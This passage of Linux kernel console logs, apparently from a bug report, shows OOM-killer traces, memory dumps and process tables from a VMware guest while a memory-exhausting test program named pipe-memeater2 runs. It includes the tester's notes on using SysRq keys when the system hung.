160.525619] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 160.532031] Workqueue: events moom_callback [ 160.533408] ffff880036c24fa0 000000007dd3d9cb ffff880036dd1c70 ffffffff815e19ba [ 160.535875] ffff880036dd1d00 ffffffff815dd02d ffff88005f108bf0 ffff88005f108bf0 [ 160.538324] ffff88007f674580 ffff88007f674ea8 ffff880036dd1d98 0000000000000046 [ 160.540795] Call Trace: [ 160.541572] [<ffffffff815e19ba>] dump_stack+0x19/0x1b [ 160.543176] [<ffffffff815dd02d>] dump_header+0x8e/0x214 [ 160.544824] [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0 [ 160.546618] [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0 [ 160.548444] [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30 [ 160.550420] [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0 [ 160.552152] [<ffffffff8137bc3d>] moom_callback+0x4d/0x50 [ 160.553828] [<ffffffff8107e02b>] process_one_work+0x17b/0x460 [ 160.555643] [<ffffffff8107edfb>] worker_thread+0x11b/0x400 [ 160.557365] [<ffffffff8107ece0>] ? rescuer_thread+0x400/0x400 [ 160.559215] [<ffffffff81085aef>] kthread+0xcf/0xe0 [ 160.560758] [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140 [ 160.562806] [<ffffffff815f206c>] ret_from_fork+0x7c/0xb0 [ 160.563824] [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140 [ 160.564921] Mem-Info: [ 160.565325] Node 0 DMA per-cpu: [ 160.565860] CPU 0: hi: 0, btch: 1 usd: 0 [ 160.566631] CPU 1: hi: 0, btch: 1 usd: 0 [ 160.567617] CPU 2: hi: 0, btch: 1 usd: 0 [ 160.568414] CPU 3: hi: 0, btch: 1 usd: 0 [ 160.569198] Node 0 DMA32 per-cpu: [ 160.569771] CPU 0: hi: 186, btch: 31 usd: 0 [ 160.570542] CPU 1: hi: 186, btch: 31 usd: 0 [ 160.571392] CPU 2: hi: 186, btch: 31 usd: 0 [ 160.572164] CPU 3: hi: 186, btch: 31 usd: 0 [ 160.572948] active_anon:94430 inactive_anon:2419 isolated_anon:0 [ 160.572948] active_file:25 inactive_file:27 isolated_file:46 [ 160.572948] unevictable:0 dirty:25 writeback:0 unstable:0 [ 160.572948] free:13044 slab_reclaimable:5548 slab_unreclaimable:8850 [ 160.572948] mapped:856 shmem:2589 pagetables:5786 bounce:0 [ 160.572948] free_cma:0 [ 160.578891] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 160.585529] lowmem_reserve[]: 0 1802 1802 1802 [ 160.586429] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5296kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 160.593312] lowmem_reserve[]: 0 0 0 0 [ 160.594029] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB [ 160.596790] Node 0 DMA32: 3297*4kB (UEM) 1562*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44708kB [ 160.599652] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 160.601103] 2666 total pagecache pages [ 160.601703] 0 pages in swap cache [ 160.602691] Swap cache stats: add 0, delete 0, find 0/0 [ 160.603580] Free swap = 0kB [ 160.604072] Total swap = 0kB [ 160.607456] 524287 pages RAM [ 160.607980] 54799 pages reserved [ 160.608499] 527635 pages shared [ 160.609024] 453340 pages non-shared [ 160.609599] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 160.610967] [ 572] 0 572 9232 522 19 0 0 systemd-journal [ 160.612373] [ 591] 0 591 29620 80 25 0 0 lvmetad [ 160.613750] [ 613] 0 613 11094 414 22 0 -1000 systemd-udevd [ 160.615158] [ 707] 0 707 12803 102 24 0 -1000 auditd [ 160.616465] [ 720] 0 720 20056 16 9 0 0 audispd [ 160.618066] [ 729] 0 729 4189 43 13 0 0 alsactl [ 160.619369] [ 730] 0 730 6551 49 18 0 0 sedispatch [ 160.620697] [ 732] 172 732 41164 55 16 0 0 rtkit-daemon [ 160.622183] [ 734] 0 734 6612 86 16 0 0 systemd-logind [ 160.623558] [ 735] 0 735 61592 373 63 0 0 vmtoolsd [ 160.624863] [ 739] 0 739 80894 4240 77 0 0 firewalld [ 160.626244] [ 745] 995 745 2133 36 9 0 0 lsmd [ 160.627506] [ 746] 0 746 96840 194 40 0 0 accounts-daemon [ 160.628884] [ 747] 0 747 84088 287 66 0 0 ModemManager [ 160.630335] [ 749] 0 749 32515 128 19 0 0 smartd [ 160.631591] [ 752] 994 752 28961 92 28 0 0 chronyd [ 160.632883] [ 756] 0 756 71323 513 39 0 0 rsyslogd [ 160.634400] [ 757] 0 757 52615 443 53 0 0 abrtd [ 160.635671] [ 759] 0 759 51993 340 54 0 0 abrt-watch-log [ 160.637062] [ 760] 32 760 16227 131 35 0 0 rpcbind [ 160.638471] [ 763] 0 763 51993 341 50 0 0 abrt-watch-log [ 160.639847] [ 766] 0 766 1094 23 8 0 0 rngd [ 160.641159] [ 768] 0 768 4829 78 14 0 0 irqbalance [ 160.642469] [ 770] 81 770 7580 425 19 0 -900 dbus-daemon [ 160.643811] [ 777] 0 777 50842 115 39 0 0 gssproxy [ 160.645177] [ 807] 70 807 7549 77 20 0 0 avahi-daemon [ 160.646534] [ 815] 0 815 28811 58 11 0 0 ksmtuned [ 160.647818] [ 816] 0 816 26974 22 10 0 0 sleep [ 160.649127] [ 817] 999 817 132837 2083 57 0 0 polkitd [ 160.650499] [ 818] 70 818 7518 60 18 0 0 avahi-daemon [ 160.651906] [ 880] 0 880 113613 994 74 0 0 NetworkManager [ 160.653405] [ 1077] 0 1077 13266 145 28 0 0 wpa_supplicant [ 160.654788] [ 1198] 0 1198 27631 3113 56 0 0 dhclient [ 160.656100] [ 1408] 0 1408 138261 2652 87 0 0 tuned [ 160.657411] [ 1409] 0 1409 20640 213 42 0 -1000 sshd [ 160.658661] [ 1416] 0 1416 138875 1130 141 0 0 libvirtd [ 160.659944] [ 1422] 0 1422 31583 150 18 0 0 crond [ 160.661296] [ 1423] 0 1423 6491 49 16 0 0 atd [ 160.662511] [ 1424] 0 1424 118308 759 51 0 0 gdm [ 160.663729] [ 1427] 0 1427 27509 31 11 0 0 agetty [ 160.665053] [ 2285] 0 2285 61020 4487 104 0 0 Xorg [ 160.666283] [ 2567] 0 2567 23306 253 44 0 0 master [ 160.667674] [ 2568] 89 2568 23332 252 45 0 0 pickup [ 160.669045] [ 2569] 89 2569 23349 251 45 0 0 qmgr [ 160.670312] [ 2580] 0 2580 64751 993 57 0 -900 abrt-dbus [ 160.671620] [ 2707] 99 2707 3888 48 11 0 0 dnsmasq [ 160.672985] [ 2708] 0 2708 3881 45 10 0 0 dnsmasq [ 160.674256] [ 2746] 0 2746 90874 322 61 0 0 upowerd [ 160.675546] [ 2770] 997 2770 101041 371 50 0 0 colord [ 160.676902] [ 2778] 42 2778 111507 299 75 0 0 pulseaudio [ 160.678231] [ 2791] 0 2791 4975 48 14 0 0 systemd-localed [ 160.679607] [ 2828] 0 2828 101278 258 47 0 0 packagekitd [ 160.681005] [ 2870] 0 2870 92702 783 45 0 0 udisksd [ 160.682294] [ 2913] 0 2913 80155 235 56 0 -900 realmd [ 160.683551] [ 2976] 0 2976 93324 821 70 0 0 gdm-session-wor [ 160.685488] [ 2992] 1000 2992 97458 200 40 0 0 gnome-keyring-d [ 160.687246] [ 3034] 1000 3034 162279 508 112 0 0 gnome-session [ 160.688795] [ 3041] 1000 3041 3488 36 10 0 0 dbus-launch [ 160.690170] [ 3042] 1000 3042 7460 298 17 0 0 dbus-daemon [ 160.691540] [ 3106] 1000 3106 76642 165 36 0 0 gvfsd [ 160.692986] [ 3110] 1000 3110 90285 685 44 0 0 gvfsd-fuse [ 160.694345] [ 3178] 1000 3178 13216 144 26 0 0 ssh-agent [ 160.695703] [ 3194] 1000 3194 84999 151 34 0 0 at-spi-bus-laun [ 160.697166] [ 3198] 1000 3198 7171 108 18 0 0 dbus-daemon [ 160.698535] [ 3201] 1000 3201 32423 159 32 0 0 at-spi2-registr [ 160.700025] [ 3213] 1000 3213 308215 2987 217 0 0 gnome-settings- [ 160.701605] [ 3230] 1000 3230 119864 373 93 0 0 pulseaudio [ 160.702984] [ 3236] 0 3236 9863 91 23 0 0 bluetoothd [ 160.704616] [ 3248] 0 3248 4972 49 13 0 0 systemd-hostnam [ 160.706041] [ 3250] 1000 3250 399482 27809 312 0 0 gnome-shell [ 160.707405] [ 3263] 0 3263 47748 273 47 0 0 cupsd [ 160.708758] [ 3287] 1000 3287 129195 382 96 0 0 gsd-printer [ 160.710124] [ 3317] 1000 3317 117500 523 49 0 0 ibus-daemon [ 160.711601] [ 3322] 1000 3322 98216 174 44 0 0 ibus-dconf [ 160.713041] [ 3324] 1000 3324 113063 487 104 0 0 ibus-x11 [ 160.714394] [ 3329] 1000 3329 132651 1039 79 0 0 gnome-shell-cal [ 160.715891] [ 3337] 1000 3337 80472 397 57 0 0 mission-control [ 160.717428] [ 3341] 1000 3341 143879 597 92 0 0 caribou [ 160.718742] [ 3343] 1000 3343 178351 1094 144 0 0 goa-daemon [ 160.720151] [ 3358] 1000 3358 83626 372 90 0 0 goa-identity-se [ 160.721577] [ 3382] 1000 3382 100148 245 48 0 0 gvfs-udisks2-vo [ 160.723002] [ 3393] 1000 3393 105443 809 54 0 0 gvfs-afc-volume [ 160.724476] [ 3399] 1000 3399 167235 855 154 0 0 evolution-sourc [ 160.725990] [ 3406] 1000 3406 78121 167 37 0 0 gvfs-mtp-volume [ 160.727476] [ 3412] 1000 3412 74935 139 33 0 0 gvfs-goa-volume [ 160.728902] [ 3419] 1000 3419 80390 181 44 0 0 gvfs-gphoto2-vo [ 160.730326] [ 3435] 1000 3435 215425 2108 157 0 0 nautilus [ 160.731786] [ 3446] 1000 3446 182851 1697 136 0 0 tracker-extract [ 160.733214] [ 3447] 1000 3447 94351 915 125 0 0 vmtoolsd [ 160.734650] [ 3448] 1000 3448 117460 674 74 0 0 tracker-miner-a [ 160.736095] [ 3449] 1000 3449 117430 623 75 0 0 tracker-miner-u [ 160.737520] [ 3451] 1000 3451 140588 1248 82 0 0 tracker-miner-f [ 160.739047] [ 3460] 1000 3460 134177 1162 66 0 0 tracker-store [ 160.740605] [ 3462] 1000 3462 112871 1244 135 0 0 abrt-applet [ 160.741951] [ 3550] 1000 3550 37459 108 31 0 0 gconfd-2 [ 160.743318] [ 3565] 1000 3565 79800 168 42 0 0 ibus-engine-sim [ 160.744710] [ 3587] 1000 3587 117863 187 47 0 0 gvfsd-trash [ 160.746059] [ 3624] 1000 3624 267938 9317 185 0 0 evolution-calen [ 160.747531] [ 3630] 1000 3630 59682 143 38 0 0 gvfsd-metadata [ 160.748929] [ 3649] 1000 3649 138689 1816 121 0 0 gnome-terminal- [ 160.750307] [ 3652] 1000 3652 2122 32 9 0 0 gnome-pty-helpe [ 160.751902] [ 3653] 1000 3653 29140 406 14 0 0 bash [ 160.753144] [ 3695] 1000 3695 1042 21 7 0 1 pipe-memeater2 [ 160.754680] [ 3696] 1000 3696 1042 21 7 0 1 pipe-memeater2 [ 160.756054] [ 3697] 1000 3697 1042 21 7 0 1 pipe-memeater2 [ 160.757442] [ 3698] 1000 3698 1042 21 7 0 1 pipe-memeater2 [ 160.758876] [ 3699] 1000 3699 1042 21 7 0 1 pipe-memeater2 [ 160.760282] [ 3700] 1000 3700 1042 21 7 0 1 pipe-memeater2 [ 160.761678] [ 3701] 1000 3701 1042 21 7 0 1 pipe-memeater2 [ 160.763303] [ 3702] 1000 3702 1042 21 7 0 1 pipe-memeater2 [ 160.764761] [ 3703] 1000 3703 1042 21 7 0 1 pipe-memeater2 [ 160.766153] [ 3704] 1000 3704 1042 21 7 0 1 pipe-memeater2 [ 160.767683] [ 3706] 1000 3706 1042 21 7 0 0 pipe-memeater2 [ 160.769049] Out of memory: Kill process 3250 (gnome-shell) score 59 or sacrifice child [ 160.770424] Killed process 3317 (ibus-daemon) total-vm:470000kB, anon-rss:2092kB, file-rss:0kB ( I pressed SysRq-m in order to display memory information, for the system was still not responding. ) [ 196.095694] SysRq : Show Memory [ 196.098000] Mem-Info: [ 196.099641] Node 0 DMA per-cpu: [ 196.101846] CPU 0: hi: 0, btch: 1 usd: 0 [ 196.105035] CPU 1: hi: 0, btch: 1 usd: 0 [ 196.109063] CPU 2: hi: 0, btch: 1 usd: 0 [ 196.112459] CPU 3: hi: 0, btch: 1 usd: 0 [ 196.115794] Node 0 DMA32 per-cpu: [ 196.118128] CPU 0: hi: 186, btch: 31 usd: 0 [ 196.121276] CPU 1: hi: 186, btch: 31 usd: 0 [ 196.124455] CPU 2: hi: 186, btch: 31 usd: 0 [ 196.126846] CPU 3: hi: 186, btch: 31 usd: 0 [ 196.128674] active_anon:94430 inactive_anon:2419 isolated_anon:0 [ 196.128674] active_file:25 inactive_file:27 isolated_file:46 [ 196.128674] unevictable:0 dirty:25 writeback:0 unstable:0 [ 196.128674] free:13046 slab_reclaimable:5548 slab_unreclaimable:8850 [ 196.128674] mapped:856 shmem:2589 pagetables:5786 bounce:0 [ 196.128674] free_cma:0 [ 196.140606] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 196.155788] lowmem_reserve[]: 0 1802 1802 1802 [ 196.157371] Node 0 DMA32 free:44616kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5288kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 196.164536] lowmem_reserve[]: 0 0 0 0 [ 196.165466] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB [ 196.168336] Node 0 DMA32: 3297*4kB (UEM) 1564*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44724kB [ 196.171141] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 196.172490] 2666 total pagecache pages [ 196.173179] 0 pages in swap cache [ 196.173715] Swap cache stats: add 0, delete 0, find 0/0 [ 196.174547] Free swap = 0kB [ 196.175015] Total swap = 0kB [ 196.178556] 524287 pages RAM [ 196.179082] 54799 pages reserved [ 196.179605] 527628 pages shared [ 196.180114] 453338 pages non-shared ( I pressed SysRq-b in order to reboot the system, for OOM killer is not invoked automatically despite DMA32's free: is still below min: watermark. ) [ 208.678839] SysRq : Resetting ---------- Example output of a hang up before OOM killer is invoked end ----------
---------- Example output of a hang up after OOM killer is invoked start ---------- ( I pressed SysRq-m in order to display memory information before I start pipe-memeater2. ) [ 75.434294] SysRq : Show Memory [ 75.436621] Mem-Info: [ 75.438188] Node 0 DMA per-cpu: [ 75.440491] CPU 0: hi: 0, btch: 1 usd: 0 [ 75.443676] CPU 1: hi: 0, btch: 1 usd: 0 [ 75.446920] CPU 2: hi: 0, btch: 1 usd: 0 [ 75.450100] CPU 3: hi: 0, btch: 1 usd: 0 [ 75.453282] Node 0 DMA32 per-cpu: [ 75.455657] CPU 0: hi: 186, btch: 31 usd: 149 [ 75.458830] CPU 1: hi: 186, btch: 31 usd: 159 [ 75.461469] CPU 2: hi: 186, btch: 31 usd: 139 [ 75.462882] CPU 3: hi: 186, btch: 31 usd: 90 [ 75.464299] active_anon:54015 inactive_anon:2094 isolated_anon:0 [ 75.464299] active_file:7055 inactive_file:58983 isolated_file:0 [ 75.464299] unevictable:0 dirty:8 writeback:0 unstable:0 [ 75.464299] free:311926 slab_reclaimable:6382 slab_unreclaimable:7573 [ 75.464299] mapped:21931 shmem:2263 pagetables:3993 bounce:0 [ 75.464299] free_cma:0 [ 75.473555] Node 0 DMA free:9484kB min:384kB low:480kB high:576kB active_anon:2192kB inactive_anon:104kB active_file:160kB inactive_file:2540kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:672kB shmem:124kB slab_reclaimable:232kB slab_unreclaimable:456kB kernel_stack:56kB pagetables:108kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 75.485351] lowmem_reserve[]: 0 1802 1802 1802 [ 75.486883] Node 0 DMA32 free:1238220kB min:44668kB low:55832kB high:67000kB active_anon:213868kB inactive_anon:8272kB active_file:28060kB inactive_file:233392kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:32kB writeback:0kB mapped:87052kB shmem:8928kB slab_reclaimable:25296kB slab_unreclaimable:29836kB kernel_stack:4408kB pagetables:15864kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 75.496482] lowmem_reserve[]: 0 0 0 0 [ 75.497196] Node 0 DMA: 5*4kB (UM) 3*8kB (UE) 2*16kB (EM) 2*32kB (UM) 2*64kB (UM) 2*128kB (M) 3*256kB (UEM) 2*512kB (EM) 1*1024kB (E) 3*2048kB (EMR) 0*4096kB = 9484kB [ 75.500108] Node 0 DMA32: 141*4kB (UEM) 116*8kB (UEM) 39*16kB (UEM) 18*32kB (UEM) 10*64kB (M) 10*128kB (UM) 7*256kB (UM) 8*512kB (UM) 7*1024kB (EM) 4*2048kB (UEM) 296*4096kB (MR) = 1238276kB [ 75.503370] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 75.504729] 68301 total pagecache pages [ 75.505351] 0 pages in swap cache [ 75.505903] Swap cache stats: add 0, delete 0, find 0/0 [ 75.506758] Free swap = 0kB [ 75.507230] Total swap = 0kB [ 75.511170] 524287 pages RAM [ 75.511675] 54799 pages reserved [ 75.512203] 600924 pages shared [ 75.512738] 132132 pages non-shared ( I started pipe-memeater2 here. ) [ 78.806223] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_score_adj=0 [ 78.811173] pipe-memeater2 cpuset=/ mems_allowed=0 [ 78.814287] CPU: 0 PID: 3088 Comm: pipe-memeater2 Not tainted 3.10.0-123.el7.x86_64 #1 [ 78.818717] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 78.821857] ffff88005f302d80 000000005d69c4df ffff88005f3ada78 ffffffff815e19ba [ 78.824265] ffff88005f3adb08 ffffffff815dd02d ffffffff810b68f8 ffff8800666dde50 [ 78.826634] 0000000000000206 ffff88005f302d80 ffff88005f3adaf0 ffffffff81102eff [ 78.829363] Call Trace: [ 78.830134] [<ffffffff815e19ba>] dump_stack+0x19/0x1b [ 78.831676] [<ffffffff815dd02d>] dump_header+0x8e/0x214 [ 78.833289] [<ffffffff810b68f8>] ? ktime_get_ts+0x48/0xe0 [ 78.834899] [<ffffffff81102eff>] ? delayacct_end+0x8f/0xb0 [ 78.836528] [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0 [ 78.838236] [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0 [ 78.839990] [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30 [ 78.841859] [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0 [ 78.843493] [<ffffffff8114b579>] __alloc_pages_nodemask+0xa09/0xb10 [ 78.845350] [<ffffffff81188779>] alloc_pages_current+0xa9/0x170 [ 78.847179] [<ffffffff811b8954>] pipe_write+0x274/0x540 [ 78.848826] [<ffffffff811af36d>] do_sync_write+0x8d/0xd0 [ 78.849928] [<ffffffff811afb0d>] vfs_write+0xbd/0x1e0 [ 78.850887] [<ffffffff811b0558>] SyS_write+0x58/0xb0 [ 78.851837] [<ffffffff815f2119>] system_call_fastpath+0x16/0x1b [ 78.852928] Mem-Info: [ 78.853402] Node 0 DMA per-cpu: [ 78.854021] CPU 0: hi: 0, btch: 1 usd: 0 [ 78.854911] CPU 1: hi: 0, btch: 1 usd: 0 [ 78.855790] CPU 2: hi: 0, btch: 1 usd: 0 [ 78.856674] CPU 3: hi: 0, btch: 1 usd: 0 [ 78.857558] Node 0 DMA32 per-cpu: [ 78.858201] CPU 0: hi: 186, btch: 31 usd: 52 [ 78.859080] CPU 1: hi: 186, btch: 31 usd: 165 [ 78.859963] CPU 2: hi: 186, btch: 31 usd: 46 [ 78.860848] CPU 3: hi: 186, btch: 31 usd: 182 [ 78.861729] active_anon:54067 inactive_anon:2094 isolated_anon:0 [ 78.861729] active_file:15 inactive_file:114 isolated_file:0 [ 78.861729] unevictable:0 dirty:0 writeback:0 unstable:0 [ 78.861729] free:13039 slab_reclaimable:5278 slab_unreclaimable:7941 [ 78.861729] mapped:494 shmem:2263 pagetables:4022 bounce:0 [ 78.861729] free_cma:0 [ 78.867365] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:2192kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:168kB slab_unreclaimable:440kB kernel_stack:56kB pagetables:108kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 78.874584] lowmem_reserve[]: 0 1802 1802 1802 [ 78.875538] Node 0 DMA32 free:44588kB min:44668kB low:55832kB high:67000kB active_anon:214076kB inactive_anon:8272kB active_file:60kB inactive_file:456kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:1976kB shmem:8928kB slab_reclaimable:20944kB slab_unreclaimable:31324kB kernel_stack:4472kB pagetables:15980kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1254 all_unreclaimable? yes [ 78.883294] lowmem_reserve[]: 0 0 0 0 [ 78.884105] Node 0 DMA: 62*4kB (M) 43*8kB (UM) 32*16kB (M) 20*32kB (M) 11*64kB (M) 6*128kB (UM) 3*256kB (UM) 3*512kB (UM) 0*1024kB 1*2048kB (R) 0*4096kB = 7568kB [ 78.887411] Node 0 DMA32: 1975*4kB (UEM) 1278*8kB (UEM) 550*16kB (UEM) 302*32kB (UEM) 61*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44588kB [ 78.890582] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 78.892105] 2425 total pagecache pages [ 78.892799] 0 pages in swap cache [ 78.893421] Swap cache stats: add 0, delete 0, find 0/0 [ 78.894381] Free swap = 0kB [ 78.894915] Total swap = 0kB [ 78.898329] 524287 pages RAM [ 78.898950] 54799 pages reserved [ 78.899634] 527290 pages shared [ 78.900229] 453223 pages non-shared [ 78.900886] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 78.902341] [ 574] 0 574 9231 503 19 0 0 systemd-journal [ 78.903948] [ 590] 0 590 29620 80 26 0 0 lvmetad [ 78.905430] [ 612] 0 612 10995 330 21 0 -1000 systemd-udevd [ 78.907001] [ 704] 0 704 12797 95 23 0 -1000 auditd [ 78.908463] [ 717] 0 717 20056 28 9 0 0 audispd [ 78.909981] [ 726] 0 726 4189 43 13 0 0 alsactl [ 78.911463] [ 728] 0 728 52615 443 55 0 0 abrtd [ 78.912905] [ 729] 0 729 6600 78 17 0 0 systemd-logind [ 78.914821] [ 730] 0 730 1094 25 8 0 0 rngd [ 78.916266] [ 732] 0 732 6551 49 19 0 0 sedispatch [ 78.917787] [ 733] 0 733 32515 129 19 0 0 smartd [ 78.919252] [ 736] 81 736 7419 337 18 0 -900 dbus-daemon [ 78.920801] [ 740] 0 740 51993 341 53 0 0 abrt-watch-log [ 78.922388] [ 745] 995 745 2133 37 9 0 0 lsmd [ 78.923820] [ 748] 0 748 4829 79 12 0 0 irqbalance [ 78.925388] [ 750] 0 750 51993 340 51 0 0 abrt-watch-log [ 78.926943] [ 757] 0 757 80894 4240 75 0 0 firewalld [ 78.928443] [ 762] 0 762 61592 381 63 0 0 vmtoolsd [ 78.929964] [ 763] 0 763 84088 285 64 0 0 ModemManager [ 78.931487] [ 770] 172 770 41164 50 16 0 0 rtkit-daemon [ 78.933007] [ 773] 0 773 96845 198 42 0 0 accounts-daemon [ 78.934618] [ 780] 0 780 54939 449 38 0 0 rsyslogd [ 78.936113] [ 781] 70 781 7549 75 21 0 0 avahi-daemon [ 78.937696] [ 783] 994 783 28961 93 27 0 0 chronyd [ 78.939164] [ 786] 0 786 50842 115 39 0 0 gssproxy [ 78.940651] [ 794] 0 794 28812 62 11 0 0 ksmtuned [ 78.942134] [ 796] 32 796 16227 131 33 0 0 rpcbind [ 78.943603] [ 806] 70 806 7518 59 19 0 0 avahi-daemon [ 78.945148] [ 818] 999 818 132797 2567 53 0 0 polkitd [ 78.946618] [ 882] 0 882 113615 480 72 0 0 NetworkManager [ 78.948203] [ 1010] 0 1010 13266 145 29 0 0 wpa_supplicant [ 78.949779] [ 1200] 0 1200 27631 3114 54 0 0 dhclient [ 78.951271] [ 1410] 0 1410 20640 213 44 0 -1000 sshd [ 78.952692] [ 1413] 0 1413 138261 2651 86 0 0 tuned [ 78.954129] [ 1416] 0 1416 138875 1130 139 0 0 libvirtd [ 78.955621] [ 1424] 0 1424 31583 151 17 0 0 crond [ 78.957092] [ 1425] 0 1425 118308 753 50 0 0 gdm [ 78.958480] [ 1456] 0 1456 6491 49 17 0 0 atd [ 78.959869] [ 1462] 0 1462 27509 33 11 0 0 agetty [ 78.961291] [ 2488] 0 2488 55958 1573 97 0 0 Xorg [ 78.962720] [ 2575] 0 2575 23306 254 44 0 0 master [ 78.964156] [ 2576] 89 2576 23332 251 46 0 0 pickup [ 78.965583] [ 2577] 89 2577 23349 252 46 0 0 qmgr [ 78.967190] [ 2583] 0 2583 64751 482 57 0 -900 abrt-dbus [ 78.968691] [ 2705] 99 2705 3888 48 11 0 0 dnsmasq [ 78.970167] [ 2706] 0 2706 3881 45 11 0 0 dnsmasq [ 78.971646] [ 2712] 0 2712 89025 249 61 0 0 gdm-session-wor [ 78.973250] [ 2715] 42 2715 140687 403 102 0 0 gnome-session [ 78.974809] [ 2718] 42 2718 3488 36 11 0 0 dbus-launch [ 78.976354] [ 2719] 42 2719 7342 186 17 0 0 dbus-daemon [ 78.977884] [ 2722] 42 2722 85002 155 34 0 0 at-spi-bus-laun [ 78.979483] [ 2728] 42 2728 7168 89 19 0 0 dbus-daemon [ 78.981023] [ 2731] 42 2731 32423 158 34 0 0 at-spi2-registr [ 78.982629] [ 2743] 42 2743 272885 1577 182 0 0 gnome-settings- [ 78.984229] [ 2750] 0 2750 90874 321 61 0 0 upowerd [ 78.985703] [ 2754] 42 2754 76643 143 37 0 0 gvfsd [ 78.987663] [ 2758] 42 2758 73901 174 42 0 0 gvfsd-fuse [ 78.989159] [ 2770] 42 2770 387894 17240 291 0 0 gnome-shell [ 78.990669] [ 2771] 997 2771 101041 373 50 0 0 colord [ 78.992139] [ 2780] 42 2780 111507 295 75 0 0 pulseaudio [ 78.993661] [ 2801] 42 2801 45167 108 25 0 0 dconf-service [ 78.995198] [ 2806] 42 2806 117500 533 47 0 0 ibus-daemon [ 78.996834] [ 2811] 42 2811 98221 686 46 0 0 ibus-dconf [ 78.998353] [ 2813] 42 2813 117506 551 113 0 0 ibus-x11 [ 78.999851] [ 2820] 42 2820 98935 402 61 0 0 mission-control [ 79.001442] [ 2822] 42 2822 143741 459 94 0 0 caribou [ 79.002912] [ 2826] 0 2826 101278 258 52 0 0 packagekitd [ 79.006211] [ 2832] 42 2832 178354 1594 141 0 0 goa-daemon [ 79.007731] [ 2867] 42 2867 100148 250 47 0 0 